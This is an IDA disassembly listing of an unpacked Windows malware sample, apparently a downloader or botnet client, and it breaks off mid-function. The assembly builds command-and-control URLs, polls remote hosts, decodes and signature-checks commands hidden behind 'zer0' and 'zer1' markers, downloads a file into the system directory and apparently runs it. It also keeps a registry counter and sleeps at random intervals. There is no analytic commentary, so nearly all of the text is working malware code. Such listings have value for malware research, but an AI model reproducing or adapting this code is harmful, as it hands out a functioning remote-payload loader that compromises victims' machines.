;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 47B54C3DA22F12F8FF246C441E267364
; File Name : u:\work\47b54c3da22f12f8ff246c441e267364_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31430000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31431000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31431000 dd 77DD590Bh ; DATA XREF: sub_31432AA2+1A�r
dword_31431004 dd 77DD59F0h ; DATA XREF: sub_31432AA2+38�r
dword_31431008 dd 77DD23D7h ; DATA XREF: sub_31432A49+3E�r
dword_3143100C dd 77DD22EAh ; DATA XREF: sub_31432A14+14�r
; sub_31432A49+1D�r
dword_31431010 dd 77DD5C55h ; DATA XREF: sub_31432A14+24�r
dword_31431014 dd 77DD189Ah ; DATA XREF: sub_31432A14+2D�r
; sub_31432A49+4E�r ...
dword_31431018 dd 77E2A571h ; DATA XREF: sub_3143256D+18B�r
dword_3143101C dd 77DE089Eh ; DATA XREF: sub_31431955+17�r
dword_31431020 dd 77DE07A3h ; DATA XREF: sub_31431955+30�r
dword_31431024 dd 77DE0D79h ; DATA XREF: sub_31431955+4D�r
dword_31431028 dd 77DE0343h ; DATA XREF: sub_31431955+5B�r
dword_3143102C dd 77DE0AF0h ; DATA XREF: sub_31431939+8�r
dword_31431030 dd 77DE042Eh ; DATA XREF: sub_31431939+12�r
dword_31431034 dd 77DDEBA2h ; DATA XREF: sub_314318EA+6�r
dword_31431038 dd 77DE0BB2h ; DATA XREF: sub_314318EA+3D�r
align 10h
dword_31431040 dd 77E79E34h ; DATA XREF: sub_31432E80+B�r
dword_31431044 dd 77E7980Ah ; DATA XREF: sub_31432E6C+D�r
dword_31431048 dd 77E7A099h ; DATA XREF: sub_31432D2E+17�r
dword_3143104C dd 77E76A2Eh ; DATA XREF: sub_31432D2E+E9�r
dword_31431050 dd 77E6BD13h ; DATA XREF: sub_31432C62+71�r
dword_31431054 dd 77E684C6h ; DATA XREF: sub_31432C62+B0�r
dword_31431058 dd 77EBB1E7h ; DATA XREF: sub_31432EFC�r
dword_3143105C dd 77EBA595h ; DATA XREF: sub_31432EF6�r
dword_31431060 dd 77E616B4h ; DATA XREF: sub_31432AF5+9B�r
dword_31431064 dd 77EBA6E9h ; DATA XREF: sub_31432EF0�r
dword_31431068 dd 77E73167h ; DATA XREF: sub_314328D7+13�r
; sub_31432D2E+8F�r
dword_3143106C dd 77E737DEh ; DATA XREF: sub_3143256D+D6�r
dword_31431070 dd 77E79D5Bh ; DATA XREF: sub_31432559+8�r
dword_31431074 dd 77E73628h ; DATA XREF: UPX0:31432501�r
; sub_31432C62+F�r
dword_31431078 dd 77F5157Dh ; DATA XREF: UPX0:3143251C�r
dword_3143107C dd 77E79D8Ch ; DATA XREF: sub_314311A0+ED�r
dword_31431080 dd 77E77963h ; DATA XREF: sub_314311A0+B9�r
; sub_314311A0+F6�r ...
dword_31431084 dd 77E7A837h ; DATA XREF: sub_314311A0+8F�r
; sub_3143237F+57�r
dword_31431088 dd 77E74672h ; DATA XREF: sub_314311A0+5A�r
; sub_3143141F+64�r ...
dword_3143108C dd 77E74155h ; DATA XREF: sub_314311A0+3D�r
; sub_31432C62+40�r
dword_31431090 dd 77E704FCh ; DATA XREF: sub_314311A0+37�r
; sub_31432C62+1B�r
dword_31431094 dd 77E775F1h ; DATA XREF: sub_3143141F+32A�r
; sub_3143185D+1�r
dword_31431098 dd 77E7513Ch ; DATA XREF: sub_31431782+29�r
dword_3143109C dd 77E61BE6h ; DATA XREF: sub_3143185D+7D�r
; sub_314319BC+16C�r ...
dword_314310A0 dd 77E73BEFh ; DATA XREF: sub_314319BC+4F�r
dword_314310A4 dd 77E79C90h ; DATA XREF: sub_31431F23+4D�r
dword_314310A8 dd 77E7A5FDh ; DATA XREF: sub_31431F23+13�r
; sub_31431FAB+2C�r
dword_314310AC dd 77E805D8h ; DATA XREF: sub_31431F23+D�r
; sub_3143256D+124�r
dword_314310B0 dd 77E61A90h ; DATA XREF: sub_31431FAB+BC�r
dword_314310B4 dd 77E706B7h ; DATA XREF: sub_31431FAB+8A�r
; sub_31432AF5+92�r
dword_314310B8 dd 77E79F93h ; DATA XREF: sub_31431FAB+26�r
; UPX0:314324F1�r
dword_314310BC dd 77E7751Ah ; DATA XREF: sub_314320B6+12�r
dword_314310C0 dd 77E7C2C4h ; DATA XREF: sub_314320E4+8�r
dword_314310C4 dd 77E7AC37h ; DATA XREF: sub_314320F3+12�r
; sub_3143210D+12�r
dword_314310C8 dd 77E61BB8h ; DATA XREF: sub_3143215E+38�r
dword_314310CC dd 77E74A3Bh ; DATA XREF: sub_31432209+13�r
dword_314310D0 dd 77E73AB3h ; DATA XREF: sub_31432209+8�r
dword_314310D4 dd 77E73C49h ; DATA XREF: sub_31432239+137�r
; sub_3143237F+66�r ...
dword_314310D8 dd 77E777EFh ; DATA XREF: sub_31432239+F4�r
; sub_3143278A+3E�r ...
dword_314310DC dd 77E78B82h ; DATA XREF: sub_3143237F+92�r
dword_314310E0 dd 77E793EFh ; DATA XREF: sub_3143237F+6E�r
dword_314310E4 dd 77E75CB5h ; DATA XREF: UPX0:3143252B�r
; sub_31432C62+C3�r
dd 0
dword_314310EC dd 77C35280h ; DATA XREF: sub_314320B6+22�r
dword_314310F0 dd 77C42E10h ; DATA XREF: sub_31432EB2�r
dword_314310F4 dd 77C43710h ; DATA XREF: sub_31432EAC�r
dword_314310F8 dd 77C43490h ; DATA XREF: sub_31432EA6�r
dword_314310FC dd 77C3528Dh ; DATA XREF: sub_3143185D:loc_314318B7�r
; sub_3143212E:loc_3143213F�r ...
; ---------------------------------------------------------------------------
loc_31431100: ; DATA XREF: UPX0:loc_31432EA0�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_31431104 dd 77C43AB0h ; DATA XREF: sub_3143141F+3C�r
; sub_3143141F+1A0�r ...
dword_31431108 dd 77C1BE00h ; DATA XREF: sub_3143141F+2A1�r
dword_3143110C dd 77C43500h ; DATA XREF: sub_31431313+37�r
; sub_3143141F+B4�r
dd 0
dword_31431114 dd 77D4BDCAh ; DATA XREF: sub_31431FAB+5D�r
dword_31431118 dd 77D4456Bh ; DATA XREF: sub_31431FAB+67�r
dword_3143111C dd 77D45CBCh ; DATA XREF: sub_31431FAB+7A�r
dword_31431120 dd 77D4C96Ah ; DATA XREF: sub_3143141F+2D8�r
; sub_31431782+5D�r ...
align 8
dword_31431128 dd 76214750h ; DATA XREF: sub_314311A0+A9�r
; sub_31431782+9D�r
dword_3143112C dd 7620AFB6h ; DATA XREF: sub_314311A0+18�r
; sub_31431782+89�r
dword_31431130 dd 76204E4Dh ; DATA XREF: sub_31431782+C5�r
dword_31431134 dd 762211EFh ; DATA XREF: sub_314321F3+8�r
; UPX0:31432967�r
dword_31431138 dd 7620BD61h ; DATA XREF: sub_314311A0+DB�r
; sub_31431782+B0�r
align 10h
dword_31431140 dd 71AB41DAh ; DATA XREF: sub_314324C3+10�r
dword_31431144 dd 71AB3ECEh ; DATA XREF: sub_3143237F+100�r
dword_31431148 dd 71AB5DE2h ; DATA XREF: sub_3143237F+10D�r
dword_3143114C dd 71AB868Dh ; DATA XREF: sub_3143237F+120�r
dword_31431150 dd 71AB32CAh ; DATA XREF: sub_314321B4+C�r
dword_31431154 dd 71AB1740h ; DATA XREF: sub_314321B4+17�r
dword_31431158 dd 71AB2BBFh ; DATA XREF: sub_314321B4+25�r
dword_3143115C dd 71AB3C22h ; DATA XREF: sub_314319BC+2B�r
; sub_3143237F+AC�r
dword_31431160 dd 71AB401Ch ; DATA XREF: sub_314319BC+44�r
; sub_314328D7+D�r
dword_31431164 dd 71AB1746h ; DATA XREF: sub_314319BC+147�r
; sub_3143237F+F0�r
dword_31431168 dd 71AB3E5Dh ; DATA XREF: sub_314319BC+15D�r
dword_3143116C dd 71AB1AF4h ; DATA XREF: sub_314319BC+17B�r
; sub_31432239+67�r ...
dword_31431170 dd 71AB5690h ; DATA XREF: sub_314319BC+1A4�r
; sub_314319BC+1D8�r ...
dword_31431174 dd 71AB8629h ; DATA XREF: sub_314319BC+550�r
; sub_31432239+128�r
dword_31431178 dd 71AB1A6Dh ; DATA XREF: sub_314319BC+559�r
; sub_31432239+12F�r
align 10h
dword_31431180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_3143141F+5�o
dd offset nullsub_1
align 10h
dword_31431190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_3143256D+5�o
dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314311A0 proc near ; CODE XREF: sub_3143141F+172�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314311CB
push 1
jmp loc_31431261
; ---------------------------------------------------------------------------
loc_314311CB: ; CODE XREF: sub_314311A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31431090 ; GetSystemDirectoryA
mov edi, dword_3143108C
lea eax, [ebp+var_110]
push offset dword_314341F8
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_31431088 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_3143212E
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314341F0
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31431084 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31431241
push 2
jmp short loc_31431261
; ---------------------------------------------------------------------------
loc_31431241: ; CODE XREF: sub_314311A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31431128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31431264
push [ebp+var_4]
call dword_31431080 ; CloseHandle
push 3
loc_31431261: ; CODE XREF: sub_314311A0+26�j
; sub_314311A0+9F�j
pop eax
jmp short loc_314312B5
; ---------------------------------------------------------------------------
loc_31431264: ; CODE XREF: sub_314311A0+B4�j
mov edi, 100000h
push edi
call sub_31432E6C
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31431138 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3143107C ; WriteFile
push [ebp+var_4]
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_3143215E
push ebx
call sub_31432E80
add esp, 0Ch
xor eax, eax
loc_314312B5: ; CODE XREF: sub_314311A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314311A0 endp
; =============== S U B R O U T I N E =======================================
sub_314312BA proc near ; CODE XREF: sub_3143141F+103�p
; sub_3143141F+1DE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 0
jle short locret_31431312
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314312D8: ; CODE XREF: sub_314312BA+53�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
shl bl, 4
xor dl, bl
add eax, 3
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, [esp+0Ch+arg_8]
jl short loc_314312D8
pop edi
pop esi
pop ebx
locret_31431312: ; CODE XREF: sub_314312BA+5�j
retn
sub_314312BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431313 proc near ; CODE XREF: sub_31431398+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31431346
add ebx, 1Ah
loc_31431346: ; CODE XREF: sub_31431313+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_3143110C
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31431370
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431370: ; CODE XREF: sub_31431313+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31431390
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31431393
; ---------------------------------------------------------------------------
loc_31431390: ; CODE XREF: sub_31431313+68�j
mov al, [ebp+arg_0]
loc_31431393: ; CODE XREF: sub_31431313+5B�j
; sub_31431313+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431398 proc near ; CODE XREF: sub_3143141F+E0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314313F5
mov edi, [ebp+arg_0]
push ebx
loc_314313AD: ; CODE XREF: sub_31431398+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31431313
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314313D9
cmp bl, 7Ah
jg short loc_314313D9
movsx esi, bl
sub esi, 61h
loc_314313D9: ; CODE XREF: sub_31431398+34�j
; sub_31431398+39�j
cmp bl, 41h
jl short loc_314313E9
cmp bl, 5Ah
jg short loc_314313E9
movsx esi, bl
sub esi, 41h
loc_314313E9: ; CODE XREF: sub_31431398+44�j
; sub_31431398+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314313AD
pop ebx
jmp short loc_314313F8
; ---------------------------------------------------------------------------
loc_314313F5: ; CODE XREF: sub_31431398+F�j
mov edi, [ebp+arg_0]
loc_314313F8: ; CODE XREF: sub_31431398+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31431398 endp
; =============== S U B R O U T I N E =======================================
sub_314313FF proc near ; CODE XREF: sub_3143141F+10F�p
; sub_3143141F+1FC�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31431403: ; CODE XREF: sub_314313FF+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31431403
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_314313FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143141F proc near ; CODE XREF: sub_31431782+BA�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1CC = byte ptr -1CCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = byte ptr -178h
var_174 = byte ptr -174h
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_120 = byte ptr -120h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431180
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1DCh
push ebx
push esi
push edi
mov [ebp+var_12C], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314315B7
add esi, 4
mov [ebp+var_134], esi
jz loc_314315B7
push esi
call dword_31431088 ; lstrlen
mov [ebp+var_20], eax
cmp eax, 50h
jle loc_314315B7
lea eax, [esi+100h]
mov cl, [eax]
mov [ebp+var_174], cl
and byte ptr [eax], 0
mov al, [esi]
mov [ebp+var_16C], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_130], ebx
js loc_314315AB
cmp ebx, 1Ah
jge loc_314315AB
inc esi
mov [ebp+var_134], esi
push 7Eh
push esi
call dword_3143110C ; strchr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_138], edi
test edi, edi
jz loc_314315AB
mov al, [edi]
mov [ebp+var_178], al
and byte ptr [edi], 0
push ebx
push esi
lea eax, [ebp+var_120]
push eax
call sub_31431398
mov al, [ebp+var_178]
mov [edi], al
lea esi, [edi+1]
mov [ebp+var_134], esi
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [esi+1]
push eax
call sub_314312BA
lea eax, [ebp+var_168]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi], al
jnz short loc_314315AB
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_120]
push eax
call dword_31431088 ; lstrlen
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 18h
test eax, eax
jnz short loc_3143159E
cmp [ebp+var_1C], eax
jz short loc_3143159E
lea eax, [ebp+var_120]
push eax
call sub_314311A0
pop ecx
and [ebp+var_12C], 0
loc_3143159E: ; CODE XREF: sub_3143141F+164�j
; sub_3143141F+169�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_314315AB: ; CODE XREF: sub_3143141F+9B�j
; sub_3143141F+A4�j ...
mov al, [ebp+var_174]
mov [esi+100h], al
loc_314315B7: ; CODE XREF: sub_3143141F+4E�j
; sub_3143141F+5D�j ...
push offset aZer1 ; "zer1"
push [ebp+arg_0]
call dword_31431104 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_31431763
add esi, 4
mov [ebp+var_134], esi
push esi
call dword_31431088 ; lstrlen
mov [ebp+var_20], eax
cmp eax, 5Ah
jle loc_31431763
push 0Ch
lea eax, [ebp+var_184]
push eax
push esi
call sub_314312BA
push 30h
lea eax, [ebp+var_1B4]
push eax
lea eax, [esi+13h]
push eax
call sub_314312BA
lea eax, [ebp+var_1B4]
push eax
call sub_314313FF
add esp, 1Ch
cmp [esi+12h], al
jnz loc_31431763
push 44h
push offset dword_31434000
lea eax, [ebp+var_128]
push eax
call sub_314318EA
lea eax, [ebp+var_1C]
push eax
push 30h
lea eax, [ebp+var_1B4]
push eax
push 0Ch
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_128]
push eax
call sub_31431955
add esp, 24h
test eax, eax
jnz loc_31431756
cmp [ebp+var_1C], eax
jz loc_31431756
push 7
pop ecx
mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Wireless"
lea edi, [ebp+var_1E8]
rep movsd
mov eax, dword_3143426C
mov [ebp+var_1B8], eax
push 13h
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
mov esi, 80000002h
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_314316CF
lea eax, [ebp+var_1CC]
push eax
call dword_31431108 ; atoi
pop ecx
mov [ebp+var_1EC], eax
jmp short loc_314316D6
; ---------------------------------------------------------------------------
loc_314316CF: ; CODE XREF: sub_3143141F+298�j
and [ebp+var_1EC], 0
loc_314316D6: ; CODE XREF: sub_3143141F+2AE�j
mov eax, [ebp+var_184]
cmp [ebp+var_1EC], eax
jnb short loc_3143174F
mov [ebp+var_1EC], eax
push eax
push offset aD ; "%d"
lea eax, [ebp+var_1CC]
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
call dword_31431088 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1E8]
push eax
push esi
call sub_31432AA2
add esp, 14h
cmp dword_31435048, 0
jnz short loc_3143173E
push [ebp+var_180]
jmp short loc_31431744
; ---------------------------------------------------------------------------
loc_3143173E: ; CODE XREF: sub_3143141F+315�j
push [ebp+var_17C]
loc_31431744: ; CODE XREF: sub_3143141F+31D�j
push offset dword_3143504C
call dword_31431094 ; InterlockedExchange
loc_3143174F: ; CODE XREF: sub_3143141F+2C3�j
and [ebp+var_12C], 0
loc_31431756: ; CODE XREF: sub_3143141F+247�j
; sub_3143141F+250�j
lea eax, [ebp+var_128]
push eax
call sub_31431939
pop ecx
loc_31431763: ; CODE XREF: sub_3143141F+1B2�j
; sub_3143141F+1CE�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_12C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3143141F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431782 proc near ; CODE XREF: sub_3143185D+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31432E6C
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31431098 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_314317EA
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_3143502C
push dword_31435044
push offset aJaeanaakqdhgry ; "jaeanaakqdhgryp"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_31431120 ; wsprintfA
add esp, 1Ch
jmp short loc_31431802
; ---------------------------------------------------------------------------
loc_314317EA: ; CODE XREF: sub_31431782+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
loc_31431802: ; CODE XREF: sub_31431782+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3143112C ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31431128 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31431138 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_3143141F
push esi
call sub_31432E80
mov esi, dword_31431130
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_31431782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3143185D proc near ; DATA XREF: sub_3143256D+169�o
push ebx
mov ebx, dword_31431094
push esi
push edi
loc_31431866: ; CODE XREF: sub_3143185D+88�j
xor esi, esi
mov edi, 46021h
loc_3143186D: ; CODE XREF: sub_3143185D+86�j
inc esi
inc esi
call sub_314321F3
test eax, eax
jz short loc_314318B7
mov al, byte_31434080[esi+esi*4]
push eax
push off_31434081[esi+esi*4]
call sub_31431782
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314318B7
push 0
push offset dword_31435044
call ebx ; InterlockedExchange
push 0
push offset dword_3143502C
call ebx ; InterlockedExchange
loc_314318B7: ; CODE XREF: sub_3143185D+19�j
; sub_3143185D+46�j
call dword_314310FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31432223
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_3143109C ; Sleep
cmp esi, 16h
jb short loc_3143186D
jmp loc_31431866
sub_3143185D endp
; =============== S U B R O U T I N E =======================================
sub_314318EA proc near ; CODE XREF: sub_3143141F+129�p
; sub_3143141F+21B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31431034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31431917
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_31431917
push 1
pop eax
jmp short loc_31431935
; ---------------------------------------------------------------------------
loc_31431917: ; CODE XREF: sub_314318EA+19�j
; sub_314318EA+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31431038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31431935: ; CODE XREF: sub_314318EA+2B�j
pop edi
pop esi
pop ebx
retn
sub_314318EA endp
; =============== S U B R O U T I N E =======================================
sub_31431939 proc near ; CODE XREF: sub_3143141F+186�p
; sub_3143141F+33E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3143102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31431030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31431939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431955 proc near ; CODE XREF: sub_3143141F+15A�p
; sub_3143141F+23D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3143101C ; CryptCreateHash
test eax, eax
jnz short loc_3143197B
push 1
pop eax
jmp short loc_314319B8
; ---------------------------------------------------------------------------
loc_3143197B: ; CODE XREF: sub_31431955+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431020 ; CryptHashData
test eax, eax
jnz short loc_31431994
push 2
pop edi
jmp short loc_314319AD
; ---------------------------------------------------------------------------
loc_31431994: ; CODE XREF: sub_31431955+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31431024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314319AD: ; CODE XREF: sub_31431955+3D�j
push [ebp+arg_0]
call dword_31431028 ; CryptDestroyHash
mov eax, edi
loc_314319B8: ; CODE XREF: sub_31431955+24�j
pop edi
pop esi
pop ebp
retn
sub_31431955 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314319BC proc near ; CODE XREF: sub_31432728+35�p
; sub_3143278A+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
